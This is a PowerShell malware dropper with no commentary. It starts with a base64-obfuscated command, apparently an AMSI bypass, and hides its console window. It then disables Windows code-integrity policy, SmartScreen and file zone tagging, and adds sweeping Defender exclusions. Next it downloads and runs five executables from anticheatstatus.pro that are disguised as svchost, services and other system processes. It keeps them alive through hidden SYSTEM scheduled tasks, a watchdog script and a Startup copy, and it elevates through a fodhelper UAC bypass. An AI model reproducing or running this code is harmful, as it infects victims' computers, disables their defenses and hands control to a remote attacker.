$ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 [SYSTem.TExT.EncodinG]::UnIcoDE.GEtsTrINg([sysTem.CONvert]::fRombasE64stRinG("IwAgAFMAdAB1AGIAOgAgAE0AYQB0AHQARwBSAGUAZgBsAAoAJgAgAHsAJABYAHAAXwBQAHIAaQBVAHcAPQBbAEEAUABwAGQAbwBNAEEAaQBOAF0AOgA6AGMAdQBSAFIARQBOAHQARABvAE0AYQBJAE4ALgBHAEUAdABhAFMAUwBFAE0AYgBMAEkARQBTACgAKQB8AHcASABFAHIAZQAtAE8AQgBKAGUAQwBUAHsAJABfAC4AbABPAEMAQQBUAEkAbwBOACAALQBhAE4AZAAgACQAXwAuAEwATwBjAGEAdABJAG8ATgAuAGUATgBEAFMAVwBJAHQASAAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAGQAbABsACcAKQB9ADsAWwB2AE8ASQBkAF0AKABnAEUAVAAtAHYAQQByAEkAYQBCAEwAZQAgAC0ATgBBAE0AZQAgACcAZQAxAFoAVgBqADEAMQA0AHgAJwAgAC0ARQByAHIAbwByAGEAYwBUAEkATwBOACAAUwBJAEwAZQBOAHQATAB5AGMATwBuAFQASQBuAHUAZQApADsAJABLAEUAZwB5AEEAcQBaAGYAUABOAEYAPQBbAFMAeQBTAHQAZQBtAC4AUgBFAEYATABlAEMAVABpAG8AbgAuAGIAaQBOAGQASQBOAGcAZgBsAEEAZwBzAF0AJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAOwAkAHgAZQBfAFQASwAxAHIAMABnAHAAPQAnAGcAaQA4AEQAbgBfADMAOABMAHUAeQBkAFQAeQBTAEcASQAnADsAJABEAFIAVAB5AHAAYgBGAFoAagBFAD0AJABYAHAAXwBQAFIAaQBVAFcALgBHAEUAdAB0AHkAcABFAFMAKAApAHwAdwBoAEUAcgBFAC0ATwBiAGoAZQBjAFQAewAkAF8ALgBOAGEAbQBlACAALQBFAFEAIAAkACgAKAAnAHMAbABpAHQAVQBpAHMAbQBBACcAWwAoADEAIAAtAHMASABMACAAMwApAC4ALgAwAF0AIAAtAGoAbwBpAE4AIAAnACcAKQApAH0AOwBbAFMAeQBTAHQAZQBNAC4AVABoAFIAZQBBAGQAaQBuAEcALgBUAEgAUgBFAGEAZABdADoAOgBzAEwARQBFAHAAKAAxADUANAApADsAJABUAHIARwBCAHAANABqADcAUAA1AFUAPQAkAGQAcgBUAFkAcABiAGYAegBqAGUALgBnAGUAVABmAGkAZQBsAEQAKAAkACgAKAAnAGQAZQBsAGkAYQBGAHQAaQBuAEkAaQBzAG0AYQAnAFsAKAA3ACsANgApAC4ALgAwAF0AIAAtAEoAbwBpAE4AIAAnACcAKQApACwAJABrAEUARwBZAEEAcQB6AGYAUABOAEYAKQA7AFsAcwB5AFMAVABlAE0ALgBUAGgAUgBlAGEARABpAE4ARwAuAFQASABSAGUAQQBEAF0AOgA6AFMATABFAGUAUAAoADQAMAA5ACkAOwAkAHQAcgBnAGIAcAA0AEoANwBQADUAVQAuAFMARQB0AHYAQQBMAFUAZQAoACQATgBVAGwAbAAsACQAdABSAHUARQApAH0A"))|Iex Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); ' $consolePtr = [Console.Window]::GetConsoleWindow() [Console.Window]::ShowWindow($consolePtr, 0) $scriptPath = "$env:TEMP\CLR\v3.0.ps1" $scriptDir = Split-Path $scriptPath -Parent if (-not (Test-Path $scriptDir)) { New-Item -ItemType Directory -Path $scriptDir -Force | Out-Null } $fullScript = @' $ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 [SYSTem.TExT.EncodinG]::UnIcoDE.GEtsTrINg([sysTem.CONvert]::fRombasE64stRinG("IwAgAFMAdAB1AGIAOgAgAE0AYQB0AHQARwBSAGUAZgBsAAoAJgAgAHsAJABYAHAAXwBQAHIAaQBVAHcAPQBbAEEAUABwAGQAbwBNAEEAaQBOAF0AOgA6AGMAdQBSAFIARQBOAHQARABvAE0AYQBJAE4ALgBHAEUAdABhAFMAUwBFAE0AYgBMAEkARQBTACgAKQB8AHcASABFAHIAZQAtAE8AQgBKAGUAQwBUAHsAJABfAC4AbABPAEMAQQBUAEkAbwBOACAALQBhAE4AZAAgACQAXwAuAEwATwBjAGEAdABJAG8ATgAuAGUATgBEAFMAVwBJAHQASAAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAGQAbABsACcAKQB9ADsAWwB2AE8ASQBkAF0AKABnAEUAVAAtAHYAQQByAEkAYQBCAEwAZQAgAC0ATgBBAE0AZQAgACcAZQAxAFoAVgBqADEAMQA0AHgAJwAgAC0ARQByAHIAbwByAGEAYwBUAEkATwBOACAAUwBJAEwAZQBOAHQATAB5AGMATwBuAFQASQBuAHUAZQApADsAJABLAEUAZwB5AEEAcQBaAGYAUABOAEYAPQBbAFMAeQBTAHQAZQBtAC4AUgBFAEYATABlAEMAVABpAG8AbgAuAGIAaQBOAGQASQBOAGcAZgBsAEEAZwBzAF0AJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAOwAkAHgAZQBfAFQASwAxAHIAMABnAHAAPQAnAGcAaQA4AEQAbgBfADMAOABMAHUAeQBkAFQAeQBTAEcASQAnADsAJABEAFIAVAB5AHAAYgBGAFoAagBFAD0AJABYAHAAXwBQAFIAaQBVAFcALgBHAEUAdAB0AHkAcABFAFMAKAApAHwAdwBoAEUAcgBFAC0ATwBiAGoAZQBjAFQAewAkAF8ALgBOAGEAbQBlACAALQBFAFEAIAAkACgAKAAnAHMAbABpAHQAVQBpAHMAbQBBACcAWwAoADEAIAAtAHMASABMACAAMwApAC4ALgAwAF0AIAAtAGoAbwBpAE4AIAAnACcAKQApAH0AOwBbAFMAeQBTAHQAZQBNAC4AVABoAFIAZQBBAGQAaQBuAEcALgBUAEgAUgBFAGEAZABdADoAOgBzAEwARQBFAHAAKAAxADUANAApADsAJABUAHIARwBCAHAANABqADcAUAA1AFUAPQAkAGQAcgBUAFkAcABiAGYAegBqAGUALgBnAGUAVABmAGkAZQBsAEQAKAAkACgAKAAnAGQAZQBsAGkAYQBGAHQAaQBuAEkAaQBzAG0AYQAnAFsAKAA3ACsANgApAC4ALgAwAF0AIAAtAEoAbwBpAE4AIAAnACcAKQApACwAJABrAEUARwBZAEEAcQB6AGYAUABOAEYAKQA7AFsAcwB5AFMAVABlAE0ALgBUAGgAUgBlAGEARABpAE4ARwAuAFQASABSAGUAQQBEAF0AOgA6AFMATABFAGUAUAAoADQAMAA5ACkAOwAkAHQAcgBnAGIAcAA0AEoANwBQADUAVQAuAFMARQB0AHYAQQBMAFUAZQAoACQATgBVAGwAbAAsACQAdABSAHUARQApAH0A"))|Iex foreach ($k in @("HKLM:\SYSTEM\CurrentControlSet\Control\CI\Policy","HKLM:\SYSTEM\CurrentControlSet\Control\CI\Protected")) { try { if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null } } catch {} } try { Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CI\Policy" -Name "VerifiedAndReputablePolicyState" -Value 0 -Type DWord -Force -ErrorAction SilentlyContinue } catch {} try { Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CI\Protected" -Name "VerifiedAndReputablePolicyStateMinValueSeen" -Value 0 -Type DWord -Force -ErrorAction SilentlyContinue } catch {} try { Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name "SacLearningModeSwitch" -Value 0 -Type DWord -Force -ErrorAction SilentlyContinue } catch {} echo "STOP" | citool -r 2>$null | Out-Null try { Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "UseOverlay" -Value 0 -Type DWord -Force -ErrorAction SilentlyContinue } catch {} try { Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Value 0 -Type DWord -Force -ErrorAction SilentlyContinue } catch {} try { Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" -Name "SaveZoneInformation" -Value 1 -Type DWord -Force -ErrorAction SilentlyContinue } catch {} try { Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" -Name "LowRiskFileTypes" -Value ".exe;.com;.bat;.cmd;.ps1;.vbs;.msi;.dll;.sys" -Type String -Force -ErrorAction SilentlyContinue } catch {} try { Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" -Name "LowRiskFileTypes" -Value ".exe;.com;.bat;.cmd;.ps1;.vbs;.msi;.dll;.sys" -Type String -Force -ErrorAction SilentlyContinue } catch {} @("C:\Program Files (x86)","C:\Users","$env:TEMP","$env:APPDATA","$env:APPDATA\Microsoft","$env:APPDATA\Windows") | ForEach-Object { Add-MpPreference -ExclusionPath $_ -ErrorAction SilentlyContinue } @("*.exe","*.ps1","*.dll","*.sys") | ForEach-Object { Add-MpPreference -ExclusionExtension $_ -ErrorAction SilentlyContinue } Start-Sleep -Seconds 5 $msFolder = "$env:APPDATA\Microsoft" $windowsFolder = "$env:APPDATA\Windows" if (-not (Test-Path $msFolder)) { New-Item -ItemType Directory -Path $msFolder -Force | Out-Null } if (-not (Test-Path $windowsFolder)) { New-Item -ItemType Directory -Path $windowsFolder -Force | Out-Null } $startupDir = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" if (-not (Test-Path $startupDir)) { New-Item -ItemType Directory -Path $startupDir -Force | Out-Null } $files = @( @{url="https://anticheatstatus.pro/ShellHost.exe"; original="conhost.exe"; appdataName="ShellHost.exe"; folder=$msFolder}, @{url="https://anticheatstatus.pro/COM_Surrogate.exe"; original="WindowsAudioGraph.exe"; appdataName="COM Surrogate.exe"; folder=$windowsFolder}, @{url="https://anticheatstatus.pro/services.exe"; original="services.exe"; appdataName="services.exe"; folder=$windowsFolder}, @{url="https://anticheatstatus.pro/MN.exe"; original="svchost.exe"; appdataName="svchost.exe"; folder=$windowsFolder}, @{url="https://anticheatstatus.pro/WmiPrvSE.exe"; original="WmiPrvSE.exe"; appdataName="WmiPrvSE.exe"; folder=$windowsFolder} ) $curl = $null -ne (Get-Command curl.exe -ErrorAction SilentlyContinue) foreach ($item in $files) { $url = $item.url $appDataName = $item.appdataName $folder = $item.folder $filePath = "$folder\$appDataName" $success = $false for ($i = 1; $i -le 5; $i++) { try { if ($curl) { curl.exe -L --retry 3 --retry-delay 2 -o "$filePath" "$url" --silent } else { certutil -urlcache -split -f "$url" "$filePath" | Out-Null } if (Test-Path $filePath) { $success = $true; break } } catch {} Start-Sleep -Seconds 3 } if ($success) { Unblock-File -Path $filePath -ErrorAction SilentlyContinue Add-MpPreference -ExclusionPath $filePath -ErrorAction SilentlyContinue cmd.exe /c "attrib +s +h `"$filePath`"" 2>$null try { Start-Process -FilePath $filePath -WindowStyle Hidden -ErrorAction Stop } catch { Start-Process -FilePath $filePath -ErrorAction SilentlyContinue } $taskNameBoot = "MicrosoftEdgeUpdateTask-{0}" -f (Get-Random -Minimum 10000 -Maximum 99999) & schtasks.exe /create /tn $taskNameBoot /tr "`"$filePath`"" /sc onstart /ru SYSTEM /rl HIGHEST /f 2>&1 | Out-Null $watchdogName = "wd_$($taskNameBoot.Split('-')[-1])" $watchdogPath = "$folder\$watchdogName.ps1" $watchdogContent = @" `$target = '$filePath' while (`$true) { try { Start-Process -FilePath `$target -WindowStyle Hidden -ErrorAction Stop } catch { Start-Process -FilePath `$target -ErrorAction SilentlyContinue } Start-Sleep -Seconds 60 } "@ $watchdogContent | Out-File -FilePath $watchdogPath -Encoding UTF8 -Force Add-MpPreference -ExclusionPath $watchdogPath -ErrorAction SilentlyContinue $taskNameWatchdog = "MicrosoftEdgeUpdateTask-{0}" -f (Get-Random -Minimum 10000 -Maximum 99999) $psCmd = "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$watchdogPath`"" & schtasks.exe /create /tn $taskNameWatchdog /tr $psCmd /sc minute /mo 1 /ru SYSTEM /rl HIGHEST /f 2>&1 | Out-Null if ($item.original -eq "conhost.exe") { $startupFilePath = "$startupDir\SecurityHealthSysTray.exe" try { Copy-Item -Path $filePath -Destination $startupFilePath -Force -ErrorAction Stop Add-MpPreference -ExclusionPath $startupFilePath -ErrorAction SilentlyContinue cmd.exe /c "attrib +s +h `"$startupFilePath`"" 2>$null } catch { for ($i = 1; $i -le 5; $i++) { try { if ($curl) { curl.exe -L --retry 3 --retry-delay 2 -o "$startupFilePath" "$url" --silent } else { certutil -urlcache -split -f "$url" "$startupFilePath" | Out-Null } if (Test-Path $startupFilePath) { Unblock-File -Path $startupFilePath -ErrorAction SilentlyContinue Add-MpPreference -ExclusionPath $startupFilePath -ErrorAction SilentlyContinue cmd.exe /c "attrib +s +h `"$startupFilePath`"" 2>$null break } } catch {} Start-Sleep -Seconds 3 } } } } Start-Sleep -Seconds 3 } Remove-Item "$env:TEMP\CLR\init_service.bat" -Force -ErrorAction SilentlyContinue Remove-Item "$env:TEMP\CLR\svchost_task.bat" -Force -ErrorAction SilentlyContinue '@ $fullScript | Out-File -FilePath $scriptPath -Encoding UTF8 -Force $runMePath = "$env:TEMP\CLR\svchost_task.bat" $uacHelperPath = "$env:TEMP\CLR\init_service.bat" $runMe = "@echo off`r`npowershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`"" $runMe | Out-File -FilePath $runMePath -Encoding ASCII -Force $scriptrunner = $null -ne (Get-Command Scriptrunner.exe -ErrorAction SilentlyContinue) if ($scriptrunner) { $uacHelper = @' @echo off reg add "HKCU\Software\Classes\.x\Shell\Open\command" /ve /d "Scriptrunner.exe -appvscript cmd.exe /c \"\"%TEMP%\CLR\svchost_task.bat\"\"" /f >nul 2>&1 reg add "HKCU\Software\Classes\ms-settings\CurVer" /ve /d ".x" /f >nul 2>&1 start fodhelper.exe timeout /T 3 /NOBREAK > nul reg delete "HKCU\Software\Classes\.x" /f >nul 2>&1 reg delete "HKCU\Software\Classes\ms-settings" /f >nul 2>&1 del "%~f0" '@ $uacHelper | Out-File -FilePath $uacHelperPath -Encoding ASCII -Force cmd.exe /c "$uacHelperPath" } else { try { Start-Process powershell.exe -Verb RunAs -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`"" -Wait -ErrorAction Stop } catch {} } exit